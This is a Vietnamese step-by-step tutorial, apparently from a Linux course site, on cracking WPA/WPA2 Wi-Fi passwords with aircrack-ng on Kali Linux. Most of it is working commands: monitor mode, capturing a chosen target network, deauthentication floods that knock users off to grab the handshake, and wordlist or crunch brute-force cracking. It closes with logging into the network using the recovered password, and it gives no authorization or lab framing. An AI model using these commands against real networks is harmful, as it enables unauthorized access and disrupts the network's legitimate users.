Thực hành Crack WI-FI trên Kali Linux

Tài liệu đầy đủ:

Sử dụng Aircrack-ng để crack mật khẩu Wifi (WPA/WPA2)
Bước 1: Mở Terminal để thực hiện các câu lệnh (tương tự Command Prompt
trong Windows)
• Bước 2: Kiểm tra tên card Wireless đang sử dụng bằng lệnh iwconfig, thông
thường là card wlan0. Nếu card wireless chưa được bật (không thể kết nối wifi)
thì có thể bật bằng lệnh ifconfig wlan0 up
• Bước 3: Chuyển card mạng Wifi sang chế độ monitor (chế độ theo dõi toàn bộ
các tín hiệu trong mạng) bằng airmon-ng.
Kiểm tra tên card Wifi với lệnh iwconfig hay airmon-ng, thông thường là wlan0.
Chuyển card wlan0 sang chế độ monitor bằng công cụ airmon với lệnh:
airmon-ng start wlan0
Lúc này, kiểm tra bằng ifconfig ta sẽ thấy có card wlan0mon
• Bước 4: Sử dụng airodump để theo dõi hoạt động các mạng wifi hiện tại qua
card wlan0mon (card wlan0 ở chế độ monitor)
airodump-ng wlan0mon
• Bước 5: Xác định mạng wifi mục tiêu và sử dụng airodump để bắt gói tin và chỉ
theo dõi duy nhất mạng mục tiêu đó:
airodump-ng -c [channel] -w [tập tin] –bssid [BSSID của mạng] wlan0mon
Ví dụ: airodump-ng -c 9 -w wifi-sniff –bssid C4:6E:1F:F6:34:B8 wlan0mon
Trong đó:
+ Quan sát trường CH để xác định Channel của điểm phát sóng
+ -w [tập tin]: xác định đường dẫn để lưu tập tin bắt được (định dạng .cap)
+ bssid: Xem trường BSSID (địa chỉ MAC của access point)
• Bước 6: Thu thập gói tin bắt tay WPA handshake (bắt tay 4 bước) trong quá trình
đăng nhập để dựa vào đó dò tìm mật khẩu.
Có 2 cách:
+ Chờ người dùng nào đó đăng nhập vào Wifi đang theo dõi.
+ Sử dụng aireplay để tạo tín hiệu deauth (kích các người dùng đang sử dụng mạng
thoát ra và đăng nhập lại liên tục. Cú pháp:
aireplay-ng –deauth [số lệnh deauth] -a [BSSID của mạng] wlan0mon
Ví dụ: aireplay-ng –deauth 5 -a C4:6E:1F:2D:D6:B8 wlan0mon (có thể thay –deauth thành
-0, khi muốn gửi không giới hạn lệnh deauth có thể đặt thông số là 0)
• Bước 7: Thực hiện chờ hoặc dùng aireplay như bước 6 đến khi nhận được gói
tin WPA handshake của mạng mục tiêu tương ứng, ta dừng quá trình bắt gói tin
(Ctrl+C) và tiến hành dò tìm mật khẩu dựa vào file .cap đã bắt được.
Có thể sử dụng phương pháp dò tìm theo Wordlist hay thực hiện Brute-force để dò
tìm mật khẩu.
– Phương pháp dùng Wordlist (danh sách các từ có sẵn)
Trong Kali cung cấp sẵn một số Wordlist thông dụng tại thư mục /usr/share/wordlist. Nổi
bật là wordlist rockyou.txt với thư viện khoảng 10 triệu mật khẩu thông dụng. Ngoài ra, có
thể dùng Crunch để tự tạo Wordlist tùy ý.
Nếu sử dụng Wordlist rockyou.txt có sẵn, ta thực hiện các lệnh sau:
cp /usr/share/wordlists/rockyou.txt.gz /root/Desktop  Copy file nén chứa
rockyou.txt ra Desktop để thuận tiện sử dụng
gzip –d /root/Desktop/rockyou.txt.gz  Giải nén file rockyou.txt.gz
Sau khi đã có file rockyou.txt đã giải nén, sử dụng lệnh sau để dò tìm password:
aircrack-ng -w [đường dẫn file Wordlist] [đường dẫn file .cap đã thiết lập ở bước 5]
Ví dụ: aircrack-ng –w /root/Desktop/rockyou.txt wifi-sniff-01.cap
– Phương pháp kết hợp tool Crunch để brute-force (dò tìm vét cạn) không cần
dùng Wordlist có sẵn
Cú pháp để sử dụng Crunch:
crunch [min] [max] [charset] -t [pattern] -o [path file] với:
 [min]: số kí tự tối thiểu
 [max]: số kí tự tối đa
 [charset]: danh sách kí tự có trong mật khẩu
 [pattern]: mẫu mật khẩu & các ký tự đã biết, ký tự chưa biết ký hiệu %
 [path file]: đừng dẫn file Wordlist được tạo
Thực hiện lệnh với cú pháp như sau:
crunch [min] [max] [danh sách các ký tự có có trong chuỗi] –t [mẫu định dạng mật
khẩu] | aircrack-ng -w- [tập tin đã capture.cap] –bssid [địa chỉ MAC của mục tiêu]
Ví dụ: Dự đoán mật khẩu có 10 ký tự là 1 số điện thoại có đầu số 091, mật khẩu gồm
các số từ 0-9 có thể dò tìm vét cạn tất cả các dãy 091xxxxxxx như sau:
crunch 10 10 0123456789 –t 091%%%%%%% | aircrack-ng –w- wifi-sniff.cap –bssid
C4:6E:1F:2D:D6:B8
Bước 8: Sau khi đã tìm được mật khẩu, tắt chế độ monitor của card wlan0 để có
thể sử dụng lại Wifi bằng lệnh
airmon-ng stop wlan0mon
Dùng mật khẩu vừa dò tim để truy cập thử Wifi

Nguồn:https://ftlinuxcourse.com/